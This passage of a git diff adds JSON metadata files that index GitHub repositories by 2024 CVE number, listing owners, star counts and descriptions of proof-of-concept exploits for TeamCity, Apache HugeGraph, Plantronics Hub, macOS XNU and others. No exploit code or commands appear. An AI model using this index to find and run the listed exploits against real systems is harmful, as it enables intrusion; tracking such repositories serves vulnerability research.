+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-27198-EXPLOIT",
+ "description": "A PoC exploit for CVE-2024-27198 - JetBrains TeamCity Authentication Bypass",
+ "fork": false,
+ "created_at": "2024-03-09T22:04:07Z",
+ "updated_at": "2024-03-16T01:31:07Z",
+ "pushed_at": "2024-03-09T22:16:46Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "authentication-bypass",
+ "cve-2024-27198",
+ "exploit",
+ "exploitation",
+ "hacked",
+ "jetbrains",
+ "poc",
+ "scanner",
+ "teamcity"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780859868,
+ "name": "Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-",
+ "full_name": "Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-",
+ "owner": {
+ "login": "Shimon03",
+ "id": 78235187,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4",
+ "html_url": "https:\/\/github.com\/Shimon03"
+ },
+ "html_url": "https:\/\/github.com\/Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-",
+ "description": "Em fevereiro de 2024, foi identificado duas novas vulnerabilidades que afetam o servidor JetBrains TeamCity (CVE-2024-27198 e CVE-2024-27199)",
+ "fork": false,
+ "created_at": "2024-04-02T09:46:51Z",
+ "updated_at": "2024-04-02T09:46:51Z",
+ "pushed_at": "2024-04-02T09:46:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790442683,
+ "name": "RCity-CVE-2024-27198",
+ "full_name": "Stuub\/RCity-CVE-2024-27198",
+ "owner": {
+ "login": "Stuub",
+ "id": 60468836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4",
+ "html_url": "https:\/\/github.com\/Stuub"
+ },
+ "html_url": "https:\/\/github.com\/Stuub\/RCity-CVE-2024-27198",
+ "description": "CVE-2024-27198 & CVE-2024-27199 PoC - RCE, Admin Account Creation, Enum Users, Server Information",
+ "fork": false,
+ "created_at": "2024-04-22T22:14:24Z",
+ "updated_at": "2024-06-21T18:38:08Z",
+ "pushed_at": "2024-04-25T17:55:35Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "code-injection",
+ "cve",
+ "cve-2024-27198",
+ "cve-2024-27199",
+ "jetbrains",
+ "owasp",
+ "python",
+ "python3",
+ "rce",
+ "teamcity"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27282.json b/2024/CVE-2024-27282.json
new file mode 100644
index 0000000000..9d28d213a4
--- /dev/null
+++ b/2024/CVE-2024-27282.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 814397041,
+ "name": "CVE-2024-27282",
+ "full_name": "Abo5\/CVE-2024-27282",
+ "owner": {
+ "login": "Abo5",
+ "id": 40110835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40110835?v=4",
+ "html_url": "https:\/\/github.com\/Abo5"
+ },
+ "html_url": "https:\/\/github.com\/Abo5\/CVE-2024-27282",
+ "description": "script to detect if the installed Ruby version on your system is vulnerable to CVE-2024-27282. You should read the description of the vulnerability for more details: https:\/\/www.ruby-lang.org\/en\/news\/2024\/04\/23\/arbitrary-memory-address-read-regexp-cve-2024-27282\/",
+ "fork": false,
+ "created_at": "2024-06-12T23:54:03Z",
+ "updated_at": "2024-06-13T00:10:18Z",
+ "pushed_at": "2024-06-13T00:10:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27316.json b/2024/CVE-2024-27316.json
new file mode 100644
index 0000000000..460218e06d
--- /dev/null
+++ b/2024/CVE-2024-27316.json
@@ -0,0 +1,69 @@
+[
+ {
+ "id": 784116051,
+ "name": "CVE-2024-27316",
+ "full_name": "lockness-Ko\/CVE-2024-27316",
+ "owner": {
+ "login": "lockness-Ko",
+ "id": 42625905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4",
+ "html_url": "https:\/\/github.com\/lockness-Ko"
+ },
+ "html_url": "https:\/\/github.com\/lockness-Ko\/CVE-2024-27316",
+ "description": "Proof of concept (PoC) for CVE-2024-27316 (tested), CVE-2024-30255 (untested), CVE-2024-31309 (untested), CVE-2024-28182 (untested), CVE-2024-2653 (untested) and CVE-2024-27919 (untested)",
+ "fork": false,
+ "created_at": "2024-04-09T08:08:07Z",
+ "updated_at": "2024-06-07T17:50:04Z",
+ "pushed_at": "2024-04-13T09:02:39Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-2653",
+ "cve-2024-27316",
+ "cve-2024-27919",
+ "cve-2024-28182",
+ "cve-2024-30255",
+ "cve-2024-31309"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 788117590,
+ "name": "CVE-2024-27316_poc",
+ "full_name": "aeyesec\/CVE-2024-27316_poc",
+ "owner": {
+ "login": "aeyesec",
+ "id": 61375985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4",
+ "html_url": "https:\/\/github.com\/aeyesec"
+ },
+ "html_url": "https:\/\/github.com\/aeyesec\/CVE-2024-27316_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-17T20:08:05Z",
+ "updated_at": "2024-04-25T03:39:10Z",
+ "pushed_at": "2024-04-17T21:31:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27348.json b/2024/CVE-2024-27348.json
new file mode 100644
index 0000000000..f0c3aced57
--- /dev/null
+++ b/2024/CVE-2024-27348.json
@@ -0,0 +1,120 @@
+[
+ {
+ "id": 808784376,
+ "name": "CVE-2024-27348",
+ "full_name": "Zeyad-Azima\/CVE-2024-27348",
+ "owner": {
+ "login": "Zeyad-Azima",
+ "id": 62406753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4",
+ "html_url": "https:\/\/github.com\/Zeyad-Azima"
+ },
+ "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2024-27348",
+ "description": "Apache HugeGraph Server RCE Scanner ( CVE-2024-27348 )",
+ "fork": false,
+ "created_at": "2024-05-31T20:11:37Z",
+ "updated_at": "2024-06-22T18:58:09Z",
+ "pushed_at": "2024-06-08T09:12:43Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "cve-scanning",
+ "exploit",
+ "vulnerability",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809953064,
+ "name": "CVE-2024-27348",
+ "full_name": "kljunowsky\/CVE-2024-27348",
+ "owner": {
+ "login": "kljunowsky",
+ "id": 104329412,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4",
+ "html_url": "https:\/\/github.com\/kljunowsky"
+ },
+ "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2024-27348",
+ "description": "Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of concept Exploit ",
+ "fork": false,
+ "created_at": "2024-06-03T19:08:24Z",
+ "updated_at": "2024-06-13T20:18:13Z",
+ "pushed_at": "2024-06-03T19:20:10Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "application-security",
+ "bugbounty",
+ "bugbounty-tool",
+ "bugbountytips",
+ "cve-2024-27348",
+ "exploit",
+ "hack",
+ "hacking-tool",
+ "hugehraph",
+ "malware",
+ "one-day-exploit",
+ "penetration-testing-tools",
+ "platform-security",
+ "rce",
+ "security",
+ "unauthenticated",
+ "web-application-security",
+ "zero-day",
+ "zero-day-exploit"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814037616,
+ "name": "CVE-2024-27348-Apache-HugeGraph-RCE",
+ "full_name": "jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-12T08:14:39Z",
+ "updated_at": "2024-06-16T15:27:17Z",
+ "pushed_at": "2024-06-12T08:19:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27460.json b/2024/CVE-2024-27460.json
new file mode 100644
index 0000000000..69d80e65a1
--- /dev/null
+++ b/2024/CVE-2024-27460.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 799487639,
+ "name": "CVE-2024-27460",
+ "full_name": "xct\/CVE-2024-27460",
+ "owner": {
+ "login": "xct",
+ "id": 9291767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9291767?v=4",
+ "html_url": "https:\/\/github.com\/xct"
+ },
+ "html_url": "https:\/\/github.com\/xct\/CVE-2024-27460",
+ "description": "Plantronics Desktop Hub LPE",
+ "fork": false,
+ "created_at": "2024-05-12T09:53:07Z",
+ "updated_at": "2024-05-30T16:51:32Z",
+ "pushed_at": "2024-05-15T15:12:59Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 799923080,
+ "name": "CVE-2024-27460",
+ "full_name": "Alaatk\/CVE-2024-27460",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27460",
+ "description": "HP Plantronics Hub 3.2.1 Updater Privilege Escalation",
+ "fork": false,
+ "created_at": "2024-05-13T11:15:14Z",
+ "updated_at": "2024-05-18T05:33:59Z",
+ "pushed_at": "2024-05-14T13:55:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802330596,
+ "name": "CVE-2024-27460-installer",
+ "full_name": "10cks\/CVE-2024-27460-installer",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-27460-installer",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-18T02:25:11Z",
+ "updated_at": "2024-05-18T02:26:11Z",
+ "pushed_at": "2024-05-18T02:26:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27462.json b/2024/CVE-2024-27462.json
new file mode 100644
index 0000000000..da3844c012
--- /dev/null
+++ b/2024/CVE-2024-27462.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 786007891,
+ "name": "CVE-2024-27462",
+ "full_name": "Alaatk\/CVE-2024-27462",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27462",
+ "description": "Wondershare MobileTrans 4.5.6 - Unquoted Service Path",
+ "fork": false,
+ "created_at": "2024-04-13T06:27:28Z",
+ "updated_at": "2024-04-17T11:52:07Z",
+ "pushed_at": "2024-04-13T06:34:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27474.json b/2024/CVE-2024-27474.json
new file mode 100644
index 0000000000..c5ad65f2d5
--- /dev/null
+++ b/2024/CVE-2024-27474.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 782029434,
+ "name": "Leantime-POC",
+ "full_name": "dead1nfluence\/Leantime-POC",
+ "owner": {
+ "login": "dead1nfluence",
+ "id": 152615382,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152615382?v=4",
+ "html_url": "https:\/\/github.com\/dead1nfluence"
+ },
+ "html_url": "https:\/\/github.com\/dead1nfluence\/Leantime-POC",
+ "description": "CVE-2024-27474, CVE-2024-27476, CVE-2024-27477",
+ "fork": false,
+ "created_at": "2024-04-04T13:58:33Z",
+ "updated_at": "2024-04-04T13:58:33Z",
+ "pushed_at": "2024-04-10T13:41:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27518.json b/2024/CVE-2024-27518.json
new file mode 100644
index 0000000000..3426dfc03f
--- /dev/null
+++ b/2024/CVE-2024-27518.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781492709,
+ "name": "CVE-2024-27518",
+ "full_name": "secunnix\/CVE-2024-27518",
+ "owner": {
+ "login": "secunnix",
+ "id": 104568161,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4",
+ "html_url": "https:\/\/github.com\/secunnix"
+ },
+ "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-27518",
+ "description": "SUPERAntiSpyware Professional X <=10.0.1264 LPE Vulnerability PoC",
+ "fork": false,
+ "created_at": "2024-04-03T13:41:18Z",
+ "updated_at": "2024-04-03T13:42:31Z",
+ "pushed_at": "2024-04-04T18:01:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27619.json b/2024/CVE-2024-27619.json
new file mode 100644
index 0000000000..ed122b6dbe
--- /dev/null
+++ b/2024/CVE-2024-27619.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 762818458,
+ "name": "dir-3040_dos",
+ "full_name": "ioprojecton\/dir-3040_dos",
+ "owner": {
+ "login": "ioprojecton",
+ "id": 46145992,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46145992?v=4",
+ "html_url": "https:\/\/github.com\/ioprojecton"
+ },
+ "html_url": "https:\/\/github.com\/ioprojecton\/dir-3040_dos",
+ "description": "CVE-2024-27619",
+ "fork": false,
+ "created_at": "2024-02-24T19:21:00Z",
+ "updated_at": "2024-03-05T14:45:29Z",
+ "pushed_at": "2024-03-29T17:01:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27630.json b/2024/CVE-2024-27630.json
new file mode 100644
index 0000000000..d6d51be63a
--- /dev/null
+++ b/2024/CVE-2024-27630.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783101689,
+ "name": "CVE-2024-27630",
+ "full_name": "ally-petitt\/CVE-2024-27630",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27630",
+ "description": "CVE-2024–27630 Reference",
+ "fork": false,
+ "created_at": "2024-04-07T00:13:13Z",
+ "updated_at": "2024-04-07T23:41:31Z",
+ "pushed_at": "2024-04-07T01:16:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27631.json b/2024/CVE-2024-27631.json
new file mode 100644
index 0000000000..bfd5bd246b
--- /dev/null
+++ b/2024/CVE-2024-27631.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783094631,
+ "name": "CVE-2024-27631",
+ "full_name": "ally-petitt\/CVE-2024-27631",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27631",
+ "description": "CVE-2024–27631 Reference",
+ "fork": false,
+ "created_at": "2024-04-06T23:30:01Z",
+ "updated_at": "2024-04-06T23:30:02Z",
+ "pushed_at": "2024-04-07T00:23:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27632.json b/2024/CVE-2024-27632.json
new file mode 100644
index 0000000000..c950a42890
--- /dev/null
+++ b/2024/CVE-2024-27632.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783096643,
+ "name": "CVE-2024-27632",
+ "full_name": "ally-petitt\/CVE-2024-27632",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27632",
+ "description": "CVE-2024–27632 Reference",
+ "fork": false,
+ "created_at": "2024-04-06T23:42:30Z",
+ "updated_at": "2024-04-08T03:11:14Z",
+ "pushed_at": "2024-04-07T00:12:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27665.json b/2024/CVE-2024-27665.json
new file mode 100644
index 0000000000..ad43499042
--- /dev/null
+++ b/2024/CVE-2024-27665.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770180757,
+ "name": "CVE-2024-27665",
+ "full_name": "Thirukrishnan\/CVE-2024-27665",
+ "owner": {
+ "login": "Thirukrishnan",
+ "id": 63901950,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4",
+ "html_url": "https:\/\/github.com\/Thirukrishnan"
+ },
+ "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2024-27665",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-11T04:46:19Z",
+ "updated_at": "2024-03-11T04:46:19Z",
+ "pushed_at": "2024-03-11T09:55:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27673.json b/2024/CVE-2024-27673.json
new file mode 100644
index 0000000000..059a83972b
--- /dev/null
+++ b/2024/CVE-2024-27673.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781524986,
+ "name": "CVE-2024-27673",
+ "full_name": "Alaatk\/CVE-2024-27673",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27673",
+ "description": "ASUS Control Center Express =< 01.06.15 - Unquoted Service Path",
+ "fork": false,
+ "created_at": "2024-04-03T14:47:20Z",
+ "updated_at": "2024-04-17T11:50:01Z",
+ "pushed_at": "2024-04-03T15:00:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27674.json b/2024/CVE-2024-27674.json
new file mode 100644
index 0000000000..a2ac1a307c
--- /dev/null
+++ b/2024/CVE-2024-27674.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781539000,
+ "name": "CVE-2024-27674",
+ "full_name": "Alaatk\/CVE-2024-27674",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27674",
+ "description": "Macro Expert <= 4.9.4 - Insecure Permissions Privilege Escalation",
+ "fork": false,
+ "created_at": "2024-04-03T15:16:09Z",
+ "updated_at": "2024-04-17T11:53:20Z",
+ "pushed_at": "2024-04-03T15:20:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27697.json b/2024/CVE-2024-27697.json
new file mode 100644
index 0000000000..e64a14616d
--- /dev/null
+++ b/2024/CVE-2024-27697.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 769730947,
+ "name": "FuguHub-8.4-Authenticated-RCE-CVE-2024-27697",
+ "full_name": "SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697",
+ "owner": {
+ "login": "SanjinDedic",
+ "id": 20748723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20748723?v=4",
+ "html_url": "https:\/\/github.com\/SanjinDedic"
+ },
+ "html_url": "https:\/\/github.com\/SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697",
+ "description": "Arbitrary Code Execution on FuguHub 8.4",
+ "fork": false,
+ "created_at": "2024-03-09T22:24:03Z",
+ "updated_at": "2024-05-10T08:46:04Z",
+ "pushed_at": "2024-03-11T03:09:35Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27804.json b/2024/CVE-2024-27804.json
new file mode 100644
index 0000000000..b199e9d5aa
--- /dev/null
+++ b/2024/CVE-2024-27804.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800535361,
+ "name": "CVE-2024-27804",
+ "full_name": "R00tkitSMM\/CVE-2024-27804",
+ "owner": {
+ "login": "R00tkitSMM",
+ "id": 78787782,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78787782?v=4",
+ "html_url": "https:\/\/github.com\/R00tkitSMM"
+ },
+ "html_url": "https:\/\/github.com\/R00tkitSMM\/CVE-2024-27804",
+ "description": "POC for CVE-2024-27804",
+ "fork": false,
+ "created_at": "2024-05-14T14:17:06Z",
+ "updated_at": "2024-06-25T04:59:17Z",
+ "pushed_at": "2024-05-14T14:55:23Z",
+ "stargazers_count": 123,
+ "watchers_count": 123,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 123,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27815.json b/2024/CVE-2024-27815.json
new file mode 100644
index 0000000000..7c192e38d3
--- /dev/null
+++ b/2024/CVE-2024-27815.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817512745,
+ "name": "CVE-2024-27815",
+ "full_name": "jprx\/CVE-2024-27815",
+ "owner": {
+ "login": "jprx",
+ "id": 36464332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36464332?v=4",
+ "html_url": "https:\/\/github.com\/jprx"
+ },
+ "html_url": "https:\/\/github.com\/jprx\/CVE-2024-27815",
+ "description": "macOS\/ XNU kernel buffer overflow. Introduced in macOS 14.0 (xnu-10002.1.13), fixed in macOS 14.5 (xnu-10063.121.3)",
+ "fork": false,
+ "created_at": "2024-06-19T22:03:02Z",
+ "updated_at": "2024-06-24T20:08:04Z",
+ "pushed_at": "2024-06-20T17:23:22Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27956.json b/2024/CVE-2024-27956.json
new file mode 100644
index 0000000000..aa31258f8e
--- /dev/null
+++ b/2024/CVE-2024-27956.json
@@ -0,0 +1,362 @@
+[
+ {
+ "id": 792712180,
+ "name": "CVE-2024-27956",
+ "full_name": "truonghuuphuc\/CVE-2024-27956",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
